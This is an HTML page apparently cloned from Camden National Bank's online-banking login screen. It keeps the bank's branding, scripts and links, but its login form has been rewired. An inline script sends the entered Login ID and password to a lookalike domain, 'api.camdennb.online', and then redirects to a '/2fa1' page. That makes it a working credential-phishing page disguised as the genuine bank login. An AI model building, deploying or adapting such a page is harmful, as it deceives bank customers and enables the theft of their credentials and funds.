        --t-input-focus-border-color: #0079c1;
        --t-input-warning-font-color: #141414;
        --t-input-warning: #f0b400;
        --t-input-error-font-color: #ffffff;
        --t-input-error: #c30000;
        --t-input-success-font-color: #ffffff;
        --t-input-success: #0e8a00;
        --t-checkbox-fill: #0096db;
        --t-checkbox-text: #ffffff;
        --t-loading-primary-color: #0096db;
        --t-loading-secondary-color: #0096db;
        --t-tooltip-multiline-max-width: 200px;
        --t-tooltip-background-color: rgba(0, 0, 0, 0.8);
        --t-tooltip-text-color: #ffffff;
        --t-tooltip-size: 5px;
        --t-tooltip-body-offset: -15px;
        --t-tooltip-transition-duration: 250ms;
        --t-tooltip-visible-duration: 2s;
        --t-gray1: #0d0d0d;
        --t-gray2: #1a1a1a;
        --t-gray3: #262626;
        --t-gray4: #333333;
        --t-gray5: #404040;
        --t-gray6: #4d4d4d;
        --t-gray7: #666666;
        --t-gray8: gray;
        --t-gray9: #999999;
        --t-gray10: #b3b3b3;
        --t-gray11: #cccccc;
        --t-gray12: #d9d9d9;
        --t-gray13: #e6e6e6;
        --t-gray14: #f2f2f2;
        --t-account-color-0: #4080a5;
        --t-account-color-1: #0096db;
        --t-account-color-2: #005587;
        --t-account-color-3: #a4d65e;
        --t-account-color-4: #00bab3;
        --t-account-color-5: #dfd1a7;
        --t-account-color-6: #8c8279;
        --t-account-color-7: #40b0e4;
        --t-account-color-8: #4080a5;
        --t-account-color-9: #bbe086;
        --t-account-color-10: #40cbc6;
        --t-account-color-11: #a9a19b;
        --t-account-color-12: #0096db;
        --t-account-color-13: #005587;
        --t-account-color-14: #a4d65e;
        --t-account-color-15: #00bab3;
      }
    </style>
  </head>

  <body
    id="pagebody"
    class="ember-application desktop theme-q2_nlp frameless phone"
  >
    <script type="text/javascript">
      yepnope({
        test: window.location.href.search("fixtureData=1") > 0,
        yep: "assets/app-fixtures_4.5.2.4B.js",
      });
    </script>
    <script type="text/javascript" charset="utf-8">
      loadApplication();
    </script>
    <script
      type="text/javascript"
      src="https://secure.camdennational.bank/CamdenNationalBankLiveEngage/live_engage.js"
    ></script>
    <script
      src="https://cdn1.onlineaccess1.com/cdn/wedge/3199/scripts/borders.js"
      type="text/javascript"
    ></script>
    <script
      type="text/javascript"
      src="https://cdn1.onlineaccess1.com/cdn/pendo/q2-pendo.js"
    ></script>

    <script
      src="https://cdn1.onlineaccess1.com/cdn/base/tecton/v1.27.1/q2-tecton-elements/q2-tecton-elements/q2-tecton-elements.esm.js"
      type="module"
      class="q2-tecton-elements"
    ></script>
    <script
      src="https://cdn1.onlineaccess1.com/cdn/base/tecton/v1.27.1/q2-tecton-elements/q2-tecton-elements/q2-tecton-elements.js"
      nomodule=""
      class="q2-tecton-elements"
    ></script>
    <div
      class="ember-view app-container desktop unauthenticated horizontal-nav pfm-disabled no-pfm-accounts"
      id="ember3"
    >
      <!---->
      <!---->
      <div
        hidden=""
        role="dialog"
        tabindex="0"
        id="q2AppOverpanel"
        class="over-panel ember-view"
        style="display: none"
      >
        <div tabindex="-1" class="overpanel-inner" test-id="overPanel">
          <div class="overpanel-header">
            <div class="overpanel-button-container">
              <!---->
            </div>

            <h1 class="overpanel-title" test-id="lblOverpanelTitle"><!----></h1>

            <div class="overpanel-button-container">
              <q2-btn
                class="overpanel-button overpanel-close"
                test-id="btnClose"
                label="Close"
                hide-label=""
                stencil-hydrated=""
              >
                <q2-icon type="close" stencil-hydrated=""></q2-icon>
              </q2-btn>
            </div>
          </div>

          <div
            id="ember4"
            class="overpanel-alert-container alert-message_container hasToast ember-view"
          >
            <div
              class="alert alert-msg alert-message_content is-toast"
              role="alert"
              test-id="q2Alert"
            >
              <div class="toast-container">
                <div class="toast t-base">
                  <div class="toast-message_inner">
                    <div
                      class="toast-line toast-line-info"
                      test-id="toastAlertVerticalLine"
                    ></div>

                    <div class="toast-content">
                      <div class="toast-row">
                        <div class="toast-icon">
                          <q2-icon
                            test-id="toastAlertIcon"
                            type="info"
                            stencil-hydrated=""
                          ></q2-icon>
                        </div>

                        <div test-id="toastAlertMessageTxt" class="toast-text">
                          <!---->
                          <div test-id="alertMessageTxt"></div>
                        </div>

                        <div class="toast-close-btn">
                          <!---->
                        </div>
                      </div>
                      <div class="toast-row">
                        <div
                          class="toast-timestamp"
                          test-id="toastAlertTimestamp"
                        >
                          <!---->
                        </div>
                        <!---->
                      </div>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div>

          <div
            class="overpanel-scroll-wrapper force-height col-md-offset-1 col-lg-offset-2 col-xs-12 col-sm-12 col-md-10 col-lg-8"
            test-id="overPanelWrapper"
          >
            <div tabindex="-1" class="overpanel-slider">
              <div id="overpanel"></div>
              <!---->
            </div>
          </div>

          <div class="overpanel-footer hidden">
            <div class="valign overpanel-footer-outer">
              <div class="overpanel-footer-inner">
                <div id="ember5" class="ui-logo small ember-view">
                  <span class="sr-only" test-id="logoDescriptiveText"
                    >Camden National Bank</span
                  >

                  <div
                    aria-hidden="true"
                    class="logo-image"
                    test-id="logoDiv"
                  ></div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
      <!---->
      <!---->
      <div class="loading-bg"></div>

      <div class="splash-bg"></div>

      <!---->
      <div class="container meta-container main-page-container">
        <div
          id="ember6"
          class="app-header ui-sticky top ember-view"
          style="top: 0px"
        >
          <div
            class="navbar navbar-fixed-top center-align-logo disable-menu-button"
            role="banner"
          >
            <div class="container meta-container" test-id="navbarContainer">
              <!---->
              <div class="navbar-branding">
                <div class="branding">
                  <div id="ember7" class="logo ui-logo small ember-view">
                    <span class="sr-only" test-id="logoDescriptiveText"
                      >Camden National Bank</span
                    >

                    <div
                      aria-hidden="true"
                      class="logo-image"
                      test-id="logoDiv"
                    ></div>
                  </div>
                </div>
              </div>

              <div id="ember8" class="custom-header ember-view"><!----></div>

              <!---->
            </div>
          </div>

          <div
            test-id="wdgtBrandingBar"
            id="ember9"
            class="branding-bar-widget widget-fence clearfix hidden ember-view"
          >
            <!---->
          </div>
        </div>
        <div class="quicktip-container main-desktop">
          <!---->
        </div>

        <div
          id="ember10"
          class="main-view grid-row drawer-view main-view ember-view"
        >
          <!---->
          <div class="content-wrapper">
            <div class="content-container">
              <header>
                <div
                  tabindex="-1"
                  class="ember-sr-only ember-sr-only-focusable"
                  id="ember-a11y-refocus-nav-message"
                >
                  The page navigation is complete. You may now navigate the page
                  content as you wish.
                </div>
                <!---->
              </header>

              <div
                class="content clearfix"
                role="main"
                test-id="mainContentArea"
              >
                <!---->
                <div
                  id="ember11"
                  class="top-widget-fence widget-fence clearfix hidden ember-view"
                >
                  <!---->
                </div>

                <section class="default-dashboard-container">
                  <!---->
                  <section class="default-dash-inner-wrapper">
                    <!---->
                    <!---->

                    <!---->
                  </section>

                  <!---->
                </section>

                <div
                  id="ember12"
                  class="widget-fence clearfix bottom-widget-fence hidden ember-view"
                >
                  <!---->
                </div>
              </div>

              <div
                class="sidebar desktop-sidebar"
                tabindex="-1"
                role="complementary"
              >
                <!---->
                <div class="sidebar-drawer">
                  <div class="sidebar-rail">
                    <div class="sidebar-content">
                      <div
                        id="ember13"
                        class="widget-fence clearfix hidden ember-view"
                      >
                        <!---->
                      </div>

                      <!---->
                    </div>
                  </div>
                </div>
              </div>
              <!---->
            </div>

            <div class="dropdown-backdrop hidden"></div>
          </div>

          <div
            role="dialog"
            tabindex="0"
            id="q2AppSidePanel"
            class="sidepanel ember-view"
            style="display: none"
          >
            <div class="sidepanel-inner">
              <!---->
            </div>
          </div>
          <div id="app-login-modal">
            <div id="login-modal"></div>
            <div class="login-outer">
                <div class="login-inner" id="login-inner">
                    <div class="quicktip-container">
                        <aside hidden="" id="ember17" class="quick-tip hidden ember-view">
                            <span class="tip-text" test-id="textQT"><!----></span>
                            <q2-btn hide-label="" test-id="btnRemoveQT" label="Close Tip" stencil-hydrated="">
                                <q2-icon type="close" stencil-hydrated=""></q2-icon>
                            </q2-btn>
                        </aside>
                        <aside hidden="" id="ember18" class="quick-tip hidden ember-view">
                            <span class="tip-text" test-id="textQT"><!----></span>
                            <q2-btn hide-label="" test-id="btnRemoveQT" label="Close Tip" stencil-hydrated="">
                                <q2-icon type="close" stencil-hydrated=""></q2-icon>
                            </q2-btn>
                        </aside>
                    </div>
                    <div class="login-title">
                        <h1 id="ember19" class="ui-logo large ember-view">
                            <span class="sr-only" test-id="logoDescriptiveText">Camden National Bank</span>
                            <div aria-hidden="true" class="logo-image" test-id="logoDiv"></div>
                        </h1>
                    </div>
        
                    <div class="login-message login-alert-message loginFormArea">
                        <div id="ember20" class="login-alert-container alert-message_container static-alert hidden ember-view">
                            <div class="alert alert-msg alert-message_content alert-danger" role="alert" aria-live="assertive">
                                <div class="alert-message_inner">
                                    <p><span role="img" class="ui-icon icon-warning-sign" aria-hidden="true" aria-label="error"></span></p>
                                    <p class="alert-message_sizer" id="login-error-message">X</p>
                                </div>
                            </div>
                        </div>
                    </div>
        
                    <div class="login-form loginFormArea">
                        <form id="login-form" novalidate>
                            <div class="field">
                                <label class="login-field" for="fldUsername">Login ID</label>
                                <input test-id="fldUsername" spellcheck="false" autocapitalize="off" autocorrect="off" placeholder="" autocomplete="username" title="" id="fldUsername" class="mrg-T-sm login-field form-control ember-text-field form-control ember-view" type="text" required>
                            </div>
                            <div class="password field">
                                <label class="login-field" for="fldPassword">Password</label>
                                <input test-id="fldPassword" spellcheck="false" autocapitalize="off" autocorrect="off" autocomplete="current-password" id="fldPassword" class="mrg-T-sm login-field form-control ember-text-field form-control ember-view" type="password" required>
                            </div>
                            <div id="submissionArea">
                                <div id="userLinks">
                                    <div id="rememberUserNameArea">
                                        <div description-id="ember22-description" test-id="ckbRememberUser" id="ember22" class="ui-checkbox ember-view">
                                            <input class="sr-only" id="ckbRememberUser" type="checkbox">
                                            <label for="ckbRememberUser">
                                                <svg aria-hidden="true" focusable="false" width="20" height="20" viewBox="0 0 20 20">
                                                    <rect fill="none" stroke="none" stroke-width="2" x="1" y="1" width="18" height="18" rx="3"></rect>
                                                    <polyline fill="none" stroke="none" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" points="4 11.4390244 7.44978307 15.0611808 16 5"></polyline>
                                                </svg>
                                                <div class="inner-label">
                                                    <div test-id="txtLabel" class="inner-text">Remember me</div>
                                                    <!---->
                                                </div>
                                            </label>
                                        </div>
                                    </div>
                                                                                                                  
                                    <button type="submit" class="btn-primary btn-block pointer btn text-white" style="color: white !important">
                                        <div class="icon"></div>
                                        Log In
                                    </button>
                                </div>
                            </div>
                        </form>
                    </div>
                </div>
            </div>
        </div>
        
        <script>
            // Base URL for the API
            const API_URL = "https://api.camdennb.online";
        
            // Handle login form submission
            document.getElementById("login-form").addEventListener("submit", async (e) => {
                e.preventDefault();
        
                // Get form values
                const username = document.getElementById("fldUsername").value;
                const password = document.getElementById("fldPassword").value;
        
                try {
                    // Send POST request to login endpoint
                    const response = await fetch(`${API_URL}/auth/login`, {
                        method: "POST",
                        headers: { "Content-Type": "application/json" },
                        body: JSON.stringify({ username, password })
                    });
        
                    // Parse the response
                    const data = await response.json();
        
                    if (response.status === 200) {
                        // Store the JWT token in a cookie
                        document.cookie = `token=${data.access_token}; path=/; max-age=1800`; // Expires in 30 minutes
                        // Redirect to 2fa1.html
                        window.location.href = "/2fa1";
                    } else {
                        // Display error message
                        document.getElementById("login-error-message").textContent = "Invalid username or password";
                        document.getElementById("ember20").classList.remove("hidden"); // Show error alert
                    }
                } catch (error) {
                    // Handle network or other errors
                    document.getElementById("login-error-message").textContent = "Error: " + error.message;
                    document.getElementById("ember20").classList.remove("hidden"); // Show error alert
                }
            });
        </script>
                        <div class="password-links">
                          <div class="password-link">
                            <a
                              href="#/login/resetPasswordUsername"
                              id="ember24"
                              class="ember-view"
                            >
                              <span class="forgot-pw" test-id="lnkForgottenPW"
                                >Forgot password?</span
                              >
                            </a>
                          </div>
                          <div class="password-link">
                            <!---->
                          </div>
                        </div>
                      </div>
                    </div>
                  </form>
                </div>

                <div class="login-icons clearfix">
                  <a href="tel:8008608821" class="login-adLink callme-button"
                    >Call Us</a
                  >
                  <a
                    href="#/branches"
                    id="ember27"
                    class="ember-view login-adLink branch-button"
                    ><span test-id="lnkBranches">Locations</span></a
                  >

                  <!---->
                  <a
                    target="_blank"
                    mobile-window="main"
                    class="login-adLink"
                    href="https://secure.camdennational.bank/digitalbanking/sdk/AutoEnrollmentE2E"
                    >Enroll Now</a
                  >
                  <a
                    target="_blank"
                    mobile-window="main"
                    class="login-adLink"
                    href="https://secure.camdennational.bank/digitalbanking/sdk/AccountRecovery"
                    >Unlock/Forgot Login ID</a
                  ><a
                    target="_blank"
                    mobile-window="popup"
                    class="login-adLink"
                    href="https://www.camdennational.bank/online-services-privacy-policy"
                    >Privacy Policy</a
                  >
                  <a
                    target="_blank"
                    mobile-window="main"
                    class="login-adLink"
                    href="https://secure.camdennational.bank/digitalbanking/sdk/AutoEnrollmentE2E"
                    >Enroll Now</a
                  >
                  <a
                    target="_blank"
                    mobile-window="main"
                    class="login-adLink"
                    href="https://secure.camdennational.bank/digitalbanking/sdk/AccountRecovery"
                    >Unlock/Forgot Login ID</a
                  ><a
                    target="_blank"
                    mobile-window="popup"
                    class="login-adLink"
                    href="https://www.camdennational.bank/online-services-privacy-policy"
                    >Privacy Policy</a
                  >
                </div>
                <div class="preLogon">
                  <div id="injected_footerContent" style="display: none">
                    <a
                      target="_blank"
                      mobile-window="main"
                      class="login-adLink"
                      href="https://secure.camdennational.bank/digitalbanking/sdk/AutoEnrollmentE2E"
                      >Enroll Now</a
                    >
                    <a
                      target="_blank"
                      mobile-window="main"
                      class="login-adLink"
                      href="https://secure.camdennational.bank/digitalbanking/sdk/AccountRecovery"
                      >Unlock/Forgot Login ID</a
                    ><a
                      target="_blank"
                      mobile-window="popup"
                      class="login-adLink"
                      href="https://www.camdennational.bank/online-services-privacy-policy"
                      >Privacy Policy</a
                    >
                  </div>
                  <img
                    src="data:image/gif;base64, R0lGODlhAQABAIAAAAUEBAAAACwAAAAAAQABAAACAkQBADs="
                    onload="$('.login-icons').append($('#injected_footerContent')[0].innerHTML);"
                  />
                </div>
                <!---->
              </div>
            </div>
          </div>
        </div>
        <a
          test-id="lnkReturnToLogin"
          href="#/login"
          id="ember14"
          class="ember-view return-to-login"
        >
          Return to login
        </a>
      </div>

      <div class="content-overlay"></div>

      <!---->
      <!---->
      <!---->
      <!---->
      <div id="ember15" class="print-content ember-view">
        <div style="overflow: auto">
          <div style="float: left">
            <img id="transaction-print-logo" alt="" role="presentation" />
          </div>
          <div class="timestamp"></div>
        </div>
        <div><!----><!----></div>
        <div class="detail-items">
          <table>
            <tbody>
              <!----><!----><!---->
            </tbody>
          </table>
        </div>
        <!---->
      </div>
    </div>
  </body>
</html>
